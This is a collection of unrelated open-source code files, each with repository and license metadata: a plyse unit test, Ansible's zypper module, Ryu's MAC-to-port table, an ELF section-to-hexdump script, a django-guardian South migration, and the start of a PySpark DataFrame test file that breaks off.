# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import purchase
| agpl-3.0 |
sebastiandev/plyse | plyse/tests/query_tree_test.py | 1 | 1769 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
from plyse.query_tree import Operand, And, Or, Not, NotOperatorError
class QueryTreeTester(unittest.TestCase):
    # Exercises the plyse query-tree node types: Operand leaves and the
    # And/Or/Not operator nodes built on top of them.

    def setUp(self):
        # Two identical operand payloads used throughout the tests.
        self.o1 = {'field': 'dummy', 'field_type': 'string', 'val': 'test', 'val_type': 'string'}
        self.o2 = {'field': 'dummy', 'field_type': 'string', 'val': 'test', 'val_type': 'string'}

    def test_operand_node(self):
        # An Operand is a leaf: no children, and leaves() yields its payload.
        o = Operand(**self.o1)
        self.assertTrue(o.is_leaf)
        self.assertEqual([], o.children)
        self.assertEqual(self.o1, o.leaves()[0])

    def assert_node(self, op):
        # Shared checks for operator nodes.  Not is unary (adding a second
        # input must raise NotOperatorError); And/Or are binary here and
        # must accept further inputs after construction.
        self.assertTrue(not op.is_leaf)
        if op.type == Not.type:
            self.assertEqual(1, len(op.inputs))
            self.assertEqual(self.o1, op.children[0])
            self.assertRaises(NotOperatorError, op.add_input, Operand(**self.o1))
        else:
            self.assertEqual(2, len(op.inputs))
            self.assertEqual(self.o1, op.children[0])
            self.assertEqual(self.o2, op.children[1])
            op.add_input(Operand(**self.o1))
            self.assertEqual(3, len(op.leaves()))
            # NOTE(review): after add_input, children[0] is expected to be an
            # Operand while children[1] is expected to be the operator's own
            # type -- this depends on how add_input restructures children;
            # confirm against plyse.query_tree.
            self.assertEqual(Operand, type(op.children[0]))
            self.assertEqual(type(op), type(op.children[1]))

    def test_or_operator_node(self):
        o1 = Operand(**self.o1)
        o2 = Operand(**self.o2)
        or_op = Or([o1, o2])
        self.assert_node(or_op)

    def test_and_operator_node(self):
        o1 = Operand(**self.o1)
        o2 = Operand(**self.o2)
        and_op = And([o1, o2])
        self.assert_node(and_op)

    def test_not_operator_node(self):
        o1 = Operand(**self.o1)
        not_op = Not([o1])
        self.assert_node(not_op)

if __name__ == '__main__':
    unittest.main()
| mit |
astorije/ansible-modules-extras | packaging/os/zypper.py | 49 | 10899 | #!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <pmc@patrickcallahan.com>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <patrik.lundin.swe@gmail.com>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import re
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
- package name or package specifier with version C(name) or C(name-1.0). You can also pass a url or a local path to a rpm file.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
required: false
choices: [ present, latest, absent ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
- Whether to disable to GPG signature checking of the package
signature being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
disable_recommends:
version_added: "1.8"
description:
- Corresponds to the C(--no-recommends) option for I(zypper). Default behavior (C(yes)) modifies zypper's default behavior; C(no) does install recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
notes: []
# informational: requirements for nodes
requirements: [ zypper, rpm ]
author: Patrick Callahan
'''
EXAMPLES = '''
# Install "nmap"
- zypper: name=nmap state=present
# Install apache2 with recommended packages
- zypper: name=apache2 state=present disable_recommends=no
# Remove the "nmap" package
- zypper: name=nmap state=absent
# Install the nginx rpm from a remote repo
- zypper: name=http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm state=present
# Install local rpm file
- zypper: name=/tmp/fancy-software.rpm state=present
'''
# Function used for getting zypper version
def zypper_version(module):
    """Return (rc, message) tuple"""
    # `zypper -V` prints its version on stdout; on failure the diagnostic
    # goes to stderr, so pick the message stream based on the exit code.
    rc, out, err = module.run_command(['/usr/bin/zypper', '-V'], check_rc=False)
    message = out if rc == 0 else err
    return rc, message
# Function used for getting versions of currently installed packages.
def get_current_version(m, packages):
    """Return {package_name: "version-release"} for *packages*.

    Queries rpm directly.  Returns None if any output line cannot be
    parsed or if any requested package is missing from rpm's output.
    """
    cmd = ['/bin/rpm', '-q', '--qf', '%{NAME} %{VERSION}-%{RELEASE}\n']
    cmd.extend(packages)
    rc, stdout, stderr = m.run_command(cmd, check_rc=False)

    current_version = {}
    rpmoutput_re = re.compile(r'^(\S+) (\S+)$')
    for stdoutline in stdout.splitlines():
        match = rpmoutput_re.match(stdoutline)
        if match is None:           # was `== None`; identity test is correct
            return None
        current_version[match.group(1)] = match.group(2)

    for package in packages:
        if package not in current_version:
            # Parenthesized so the module also parses under Python 3
            # (identical output on Python 2 for a single argument).
            print(package + ' was not returned by rpm \n')
            return None

    return current_version
# Function used to find out if a package is currently installed.
def get_package_state(m, packages):
    """Return {package_name: bool} telling whether each package is installed.

    Entries in *packages* that are rpm files (local path or URL) are first
    resolved to the package name they contain, mutating the list in place
    (callers rely on this).  Returns None if rpm output cannot be parsed
    or a package is missing from it.
    """
    for i, package in enumerate(packages):
        # Resolve local rpm files / rpm URLs to their contained package name.
        if ".rpm" in package:
            if not os.path.isfile(package) and '://' not in package:
                m.fail_json(msg="No Package file matching '%s' found on system" % package)
            cmd = ['/bin/rpm', '--query', '--qf', '%{NAME}', '--package', package]
            rc, stdout, stderr = m.run_command(cmd, check_rc=False)
            packages[i] = stdout

    cmd = ['/bin/rpm', '--query', '--qf', 'package %{NAME} is installed\n']
    cmd.extend(packages)
    rc, stdout, stderr = m.run_command(cmd, check_rc=False)

    installed_state = {}
    rpmoutput_re = re.compile(r'^package (\S+) (.*)$')
    for stdoutline in stdout.splitlines():
        match = rpmoutput_re.match(stdoutline)
        if match is None:           # was `== None`; identity test is correct
            return None
        # rpm reports either "is installed" or "is not installed".
        installed_state[match.group(1)] = (match.group(2) == 'is installed')

    for package in packages:
        if package not in installed_state:
            # Parenthesized so the module also parses under Python 3.
            print(package + ' was not returned by rpm \n')
            return None

    return installed_state
# Function used to make sure a package is present.
def package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
    """Install every package in *name* that is not yet installed.

    Returns (rc, stdout, stderr, changed); changed is True only when zypper
    ran and exited successfully.
    """
    packages = [package for package in name if not installed_state[package]]
    if not packages:
        # Nothing to do; report success without invoking zypper.
        return (0, '', '', False)

    cmd = ['/usr/bin/zypper', '--non-interactive']
    # Global options must precede the zypper subcommand.
    if disable_gpg_check:
        cmd.append('--no-gpg-checks')
    cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
    # --no-recommends is only understood by newer zypper releases.
    if disable_recommends and not old_zypper:
        cmd.append('--no-recommends')
    cmd.extend(packages)

    rc, stdout, stderr = m.run_command(cmd, check_rc=False)
    return (rc, stdout, stderr, rc == 0)
# Function used to make sure a package is the latest available version.
def package_latest(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
    """Ensure every package in *name* is installed and at the latest
    available version; returns (rc, stdout, stderr, changed)."""
    # Installing missing packages first already reports `changed` for them.
    (rc, stdout, stderr, changed) = package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper)

    # Only snapshot versions when nothing changed yet -- otherwise the
    # answer is already known and the extra rpm queries can be skipped.
    if not changed:
        pre_upgrade_versions = get_current_version(m, name)

    cmd = ['/usr/bin/zypper', '--non-interactive']
    if disable_gpg_check:
        cmd.append('--no-gpg-checks')
    # Old zypper releases have no usable `update` for this; `install`
    # upgrades already-installed packages there.
    subcommand = 'install' if old_zypper else 'update'
    cmd.extend([subcommand, '--auto-agree-with-licenses', '-t', package_type])
    cmd.extend(name)
    rc, stdout, stderr = m.run_command(cmd, check_rc=False)

    if not changed and pre_upgrade_versions != get_current_version(m, name):
        changed = True

    return (rc, stdout, stderr, changed)
# Function used to make sure a package is not installed.
def package_absent(m, name, installed_state, package_type, old_zypper):
    """Remove every package in *name* that is currently installed.

    Returns (rc, stdout, stderr, changed); changed is True only when zypper
    ran and exited successfully.  *old_zypper* is accepted for signature
    parity with the other handlers but is not needed for `remove`.
    """
    packages = [package for package in name if installed_state[package]]
    if not packages:
        # Nothing to do; report success without invoking zypper.
        return (0, '', '', False)

    cmd = ['/usr/bin/zypper', '--non-interactive', 'remove', '-t', package_type]
    cmd.extend(packages)
    rc, stdout, stderr = m.run_command(cmd)
    return (rc, stdout, stderr, rc == 0)
# ===========================================
# Main control flow
def main():
    # Entry point for the Ansible `zypper` module: parse arguments, detect
    # the zypper generation, query current package state, then dispatch to
    # the present/absent/latest handler and report the result.
    module = AnsibleModule(
        argument_spec = dict(
            name = dict(required=True, aliases=['pkg'], type='list'),
            state = dict(required=False, default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
            type = dict(required=False, default='package', choices=['package', 'patch', 'pattern', 'product', 'srcpackage']),
            disable_gpg_check = dict(required=False, default='no', type='bool'),
            disable_recommends = dict(required=False, default='yes', type='bool'),
        ),
        supports_check_mode = False
    )

    params = module.params
    name = params['name']
    state = params['state']
    type_ = params['type']
    disable_gpg_check = params['disable_gpg_check']
    disable_recommends = params['disable_recommends']

    rc = 0
    stdout = ''
    stderr = ''
    result = {}
    result['name'] = name
    result['state'] = state

    # Major version 0 is treated as "old" zypper (the handlers then avoid
    # --no-recommends and use `install` instead of `update`).  Note that an
    # unparseable version string is also treated as a modern zypper.
    rc, out = zypper_version(module)
    match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
    if not match or int(match.group(1)) > 0:
        old_zypper = False
    else:
        old_zypper = True

    # Get package state (also resolves .rpm files/URLs to package names,
    # mutating `name` in place).
    installed_state = get_package_state(module, name)

    # Perform requested action
    if state in ['installed', 'present']:
        (rc, stdout, stderr, changed) = package_present(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
    elif state in ['absent', 'removed']:
        (rc, stdout, stderr, changed) = package_absent(module, name, installed_state, type_, old_zypper)
    elif state == 'latest':
        (rc, stdout, stderr, changed) = package_latest(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)

    if rc != 0:
        # Prefer zypper's stderr for the failure message, fall back to stdout.
        if stderr:
            module.fail_json(msg=stderr)
        else:
            module.fail_json(msg=stdout)

    result['changed'] = changed
    module.exit_json(**result)
# import module snippets
# NOTE: the wildcard import is required by Ansible's legacy module framework;
# it injects AnsibleModule and the other helpers used by main() at load time.
from ansible.module_utils.basic import *
# Ansible executes module files as plain scripts, so invoke the entry point
# unconditionally (no __main__ guard, matching the classic module layout).
main()
| gpl-3.0 |
09zwcbupt/ryu | ryu/controller/mac_to_port.py | 63 | 1898 | # Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2011 Isaku Yamahata <yamahata at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from ryu.lib.mac import haddr_to_str
LOG = logging.getLogger('ryu.controller.mac_to_port')
class MacToPortTable(object):
    """MAC addr <-> (dpid, port name)

    Simple learning table: for each datapath id (dpid) it keeps a
    {mac address -> port number} dictionary.
    """

    def __init__(self):
        super(MacToPortTable, self).__init__()
        # dpid -> {mac address -> port number}
        self.mac_to_port = {}

    def dpid_add(self, dpid):
        """Ensure an (initially empty) learning table exists for *dpid*."""
        LOG.debug('dpid_add: 0x%016x', dpid)
        self.mac_to_port.setdefault(dpid, {})

    def port_add(self, dpid, port, mac):
        """Learn that *mac* was seen on (*dpid*, *port*).

        :returns: old port if learned. (this may be = port)
                  None otherwise
        """
        old_port = self.mac_to_port[dpid].get(mac, None)
        self.mac_to_port[dpid][mac] = port

        if old_port is not None and old_port != port:
            # The MAC moved to a different port; log the migration.
            LOG.debug('port_add: 0x%016x 0x%04x %s',
                      dpid, port, haddr_to_str(mac))

        return old_port

    def port_get(self, dpid, mac):
        """Return the port *mac* was learned on for *dpid*, or None.

        Raises KeyError if *dpid* itself has never been added.
        """
        # LOG.debug('dpid 0x%016x mac %s', dpid, haddr_to_str(mac))
        return self.mac_to_port[dpid].get(mac)

    def mac_list(self, dpid, port):
        """Return all MACs learned on (*dpid*, *port*).

        Fix: previously an unknown *dpid* made ``.get(dpid)`` return None and
        the subsequent ``.items()`` raised AttributeError; now an unknown dpid
        simply yields an empty list.
        """
        return [mac for (mac, port_) in self.mac_to_port.get(dpid, {}).items()
                if port_ == port]

    def mac_del(self, dpid, mac):
        """Forget *mac* for *dpid*; raises KeyError if it was never learned."""
        del self.mac_to_port[dpid][mac]
| apache-2.0 |
izard/RTBench | tools/src/baremetal/smallos/scripts/parser.py | 1 | 7293 | #!/usr/bin/python
#;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
#
# Copyright (c) 2001-2009, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os, sys
import re
import getopt
VERSION=0.15
class SegmentError(Exception):
    """Raised for invalid segment operations (e.g. dumping a non-allocated
    section).  The offending detail is kept in ``value`` and echoed by str()."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        # Mirror the stored value's repr, whatever its type.
        return "%r" % (self.value,)
class Segmant(object):
    """One ELF section header row as reported by ``readelf -S -W``.

    Numeric header fields are parsed in __init__; the hexdump payload and the
    '/origin' header lines are produced lazily and cached on first use.
    """

    # Class-level defaults (kept for compatibility with code that inspects
    # the class before instantiation).
    name = ""
    elf_type = ""
    phyAddr = 0
    offset = 0
    size = 0
    es = ""
    flg = ""
    lk = 0
    inf = 0
    al = 0
    hexdata = list()
    header = list()

    def __init__(self, args):
        # args is the 10-field list split out of one readelf section line.
        self.name = args[0]
        self.elf_type = args[1]
        # Address/offset/size columns are hexadecimal.
        self.phyAddr, self.offset, self.size = (
            int(args[i], 16) for i in (2, 3, 4))
        self.es = args[5]
        self.flg = args[6]
        # Link/info/alignment columns are decimal.
        self.lk, self.inf, self.al = (int(args[i], 10) for i in (7, 8, 9))

    def isAlloc(self):
        """True if the section carries the allocated ('A') flag."""
        return self.flg.find('A') != -1

    def isMerge(self):
        """True if the section carries the mergeable ('M') flag."""
        return self.flg.count('M') > 0

    def __str__(self):
        return self.name

    def getHeader(self, kernel='kernel'):
        """Return (and cache) the '/origin' address header lines.

        One header per 256-line hexdump page; each page covers 16 bytes/line
        * 256 lines = 4096 bytes, hence the 4096-byte address stride.
        """
        if not self.header:
            dump = self.getBin(kernel)
            nlines = len(dump)
            # ceil(nlines / 256) pages, but always at least one header.
            pages = max(1, -(-nlines // 256))
            self.header = ['/origin %08x\n' % (self.phyAddr + page * 4096)
                           for page in range(pages)]
        return self.header

    def getBin(self, kernel='kernel'):
        """Return (and cache) the section's hexdump lines from *kernel*."""
        if not self.isAlloc():
            raise SegmentError("Can't generate bin data on non-allocated sect.")
        if not self.hexdata:
            # 16 bytes per output line, upper-case hex, space separated.
            cmd = ('hexdump -v -s %d -n %d' % (self.offset, self.size)
                   + ' -e \'16/1 "%02X " "\n"\''
                   + ' ' + kernel)
            pipe = os.popen(cmd)
            self.hexdata = pipe.readlines()
            pipe.close()
        return self.hexdata
class binary(object):
    """Driver: read ELF section headers from *inF* via readelf, then write
    every allocated section to *outF* as hexdump pages, each page preceded
    by a '/origin' address header.  Python 2 only (print >> / except-comma)."""
    def combine(self,msegs):
        # Fold a run of contiguous mergeable segments into one synthetic
        # Segmant: names joined with ',', sizes summed, other fields taken
        # from the first segment, and the 'M' flag dropped so the result is
        # written out like a plain allocated section.
        args = (
            ','.join([seg.name for seg in msegs]),
            msegs[0].elf_type,
            str(hex(msegs[0].phyAddr)),
            str(hex(msegs[0].offset)),
            str(hex(sum(seg.size for seg in msegs))),
            msegs[0].es,
            msegs[0].flg.replace('M',''),
            str(msegs[0].lk),
            str(msegs[0].inf),
            str(msegs[0].al)
        )
        return Segmant(args)
    def process(self):
        # Walk all parsed segments: buffer consecutive mergeable ones and
        # flush them (combined) just before the next non-merge allocated
        # segment is written.  SegmentError from toFile() is swallowed.
        # NOTE(review): a trailing run of mergeable segments is never
        # flushed after the loop — confirm whether that is intended.
        merge = []
        for s in self.segs:
            try:
                if(s.isAlloc()):
                    if(s.isMerge()):
                        merge.append(s)
                    else:
                        if(len(merge) != 0):
                            self.toFile(self.combine(merge))
                            merge = []
                        self.toFile(s)
            except SegmentError, e:
                #print >> self.log_stream, "SegmangError:%s" % (str(e))
                pass
    def toFile(self,seg):
        # Append one segment to the output file: for each 256-line hexdump
        # page, write its '/origin' header followed by the page's lines.
        header = seg.getHeader()
        print >> self.log_stream, seg.name + str(header)
        data = seg.getBin()
        count = 0
        out = open(self.outName,'a')
        if(len(header) > 1):
            # Multi-page section: emit header + full 256-line page pairs.
            for l in header[:-1]:
                out.write(l)
                for ll in data[count*256:(count+1)*256]:
                    out.write(ll)
                count += 1
        # Last (or only) header, followed by the remaining lines.
        out.write(header[-1])
        for ll in data[count*256:]:
            out.write(ll)
        out.close()
    def __init__(self,inF='kernel',outF='linux_boot/smallOS.bin',log=sys.stdout):
        # log: stream for progress/diagnostic messages (defaults to stdout).
        self.log_stream = log
        print >> self.log_stream, "LWRTE Parser %1.2f, inFile:%s, outFile:%s" % (VERSION,inF, outF)
        self.segs = list()
        self.inName = inF
        self.outName = outF
    def clean(self):
        # Remove any stale output so toFile()'s append-mode writes start fresh.
        if(os.path.exists(self.outName)):
            print >> self.log_stream, "Cleaning old file:%s" % (self.outName)
            os.remove(self.outName)
    def build(self,buf):
        # Parse `readelf -S -W` output: keep only lines that split into the
        # 10 section-header fields after the "[Nr]" column; anything else
        # (headers, banners) raises IndexError/ValueError and is skipped.
        # NOTE(review): re-binding `buf` shadows the parameter, which is
        # harmless here because the for-iterator already holds the original
        # list — but it is confusing.
        for l in buf:
            try:
                buf=re.split('\s+',l.split('] ')[1])[:-1]
                if(len(buf)==10):
                    self.segs.append(Segmant(buf))
            except IndexError, e:
                #print >> self.log_stream, "IndexError:%s" % (str(e))
                pass
            except ValueError, e:
                #print >> self.log_stream, "ValueError:%s" % (str(e))
                pass
    def start(self):
        # Full pipeline: dump section headers, reset output, parse, write.
        buf=os.popen('readelf -S -W %s' % (self.inName)).readlines()
        self.clean()
        self.build(buf)
        self.process()
# CLI entry point: parse -i/--input (ELF file) and -o/--output (bin file)
# and run the converter.  Python 2 only (except-comma, print statement).
if __name__ == "__main__":
    try:
        opts, args = getopt.getopt(sys.argv[1:], "i:o:", ["input=","output="])
        outFile = None
        inFile = None
        for o, a in opts:
            if (o in ("-i", "--input")):
                inFile = a
            elif(o in ("-o", "--output")):
                outFile = a
            else:
                assert False, "unhandled option"
        # NOTE(review): if either flag is missing the script exits silently
        # with status 0 — confirm whether a usage message was intended.
        if(not None in (outFile, inFile)):
            log_stream = sys.stdout
            #log_stream = open('log.txt','w')
            binary(inFile,outFile,log_stream).start()
            # NOTE(review): this closes sys.stdout when the default stream is
            # used; only correct if the file-based log above is re-enabled.
            log_stream.close()
    except getopt.GetoptError, err:
        print str(err)
        sys.exit(2)
| bsd-3-clause |
wvolz/django-guardian | guardian/migrations/0002_auto__add_field_groupobjectpermission_object_pk__add_field_userobjectp.py | 85 | 5650 | # encoding: utf-8
from south.db import db
from south.v2 import SchemaMigration
from guardian.compat import user_model_label
class Migration(SchemaMigration):
    """South schema migration: add a TextField ``object_pk`` column
    (default '') to guardian's GroupObjectPermission and
    UserObjectPermission tables, and drop it again on rollback."""

    def forwards(self, orm):
        # Adding field 'GroupObjectPermission.object_pk'
        db.add_column('guardian_groupobjectpermission', 'object_pk', self.gf('django.db.models.fields.TextField')(default=''), keep_default=False)

        # Adding field 'UserObjectPermission.object_pk'
        db.add_column('guardian_userobjectpermission', 'object_pk', self.gf('django.db.models.fields.TextField')(default=''), keep_default=False)

    def backwards(self, orm):
        # Deleting field 'GroupObjectPermission.object_pk'
        db.delete_column('guardian_groupobjectpermission', 'object_pk')

        # Deleting field 'UserObjectPermission.object_pk'
        db.delete_column('guardian_userobjectpermission', 'object_pk')

    # Frozen model definitions backing the ``orm`` argument above; generated
    # by South, keyed with the swappable user model label.  Do not hand-edit.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        user_model_label: {
            'Meta': {'object_name': user_model_label.split('.')[-1]},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'guardian.groupobjectpermission': {
            'Meta': {'unique_together': "(['group', 'permission', 'content_type', 'object_id'],)", 'object_name': 'GroupObjectPermission'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'object_pk': ('django.db.models.fields.TextField', [], {'default': "''"}),
            'permission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Permission']"})
        },
        'guardian.userobjectpermission': {
            'Meta': {'unique_together': "(['user', 'permission', 'content_type', 'object_id'],)", 'object_name': 'UserObjectPermission'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'object_pk': ('django.db.models.fields.TextField', [], {'default': "''"}),
            'permission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Permission']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_model_label})
        }
    }

    complete_apps = ['guardian']
| bsd-2-clause |
zzcclp/spark | python/pyspark/sql/tests/test_dataframe.py | 9 | 42005 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pydoc
import shutil
import tempfile
import time
import unittest
from pyspark.sql import SparkSession, Row
from pyspark.sql.types import StringType, IntegerType, DoubleType, StructType, StructField, \
BooleanType, DateType, TimestampType, FloatType
from pyspark.sql.utils import AnalysisException, IllegalArgumentException
from pyspark.testing.sqlutils import ReusedSQLTestCase, SQLTestUtils, have_pyarrow, have_pandas, \
pandas_requirement_message, pyarrow_requirement_message
from pyspark.testing.utils import QuietTest
class DataFrameTests(ReusedSQLTestCase):
def test_range(self):
self.assertEqual(self.spark.range(1, 1).count(), 0)
self.assertEqual(self.spark.range(1, 0, -1).count(), 1)
self.assertEqual(self.spark.range(0, 1 << 40, 1 << 39).count(), 2)
self.assertEqual(self.spark.range(-2).count(), 0)
self.assertEqual(self.spark.range(3).count(), 3)
def test_duplicated_column_names(self):
df = self.spark.createDataFrame([(1, 2)], ["c", "c"])
row = df.select('*').first()
self.assertEqual(1, row[0])
self.assertEqual(2, row[1])
self.assertEqual("Row(c=1, c=2)", str(row))
# Cannot access columns
self.assertRaises(AnalysisException, lambda: df.select(df[0]).first())
self.assertRaises(AnalysisException, lambda: df.select(df.c).first())
self.assertRaises(AnalysisException, lambda: df.select(df["c"]).first())
def test_freqItems(self):
vals = [Row(a=1, b=-2.0) if i % 2 == 0 else Row(a=i, b=i * 1.0) for i in range(100)]
df = self.sc.parallelize(vals).toDF()
items = df.stat.freqItems(("a", "b"), 0.4).collect()[0]
self.assertTrue(1 in items[0])
self.assertTrue(-2.0 in items[1])
def test_help_command(self):
# Regression test for SPARK-5464
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
df = self.spark.read.json(rdd)
# render_doc() reproduces the help() exception without printing output
pydoc.render_doc(df)
pydoc.render_doc(df.foo)
pydoc.render_doc(df.take(1))
def test_dropna(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True)])
# shouldn't drop a non-null row
self.assertEqual(self.spark.createDataFrame(
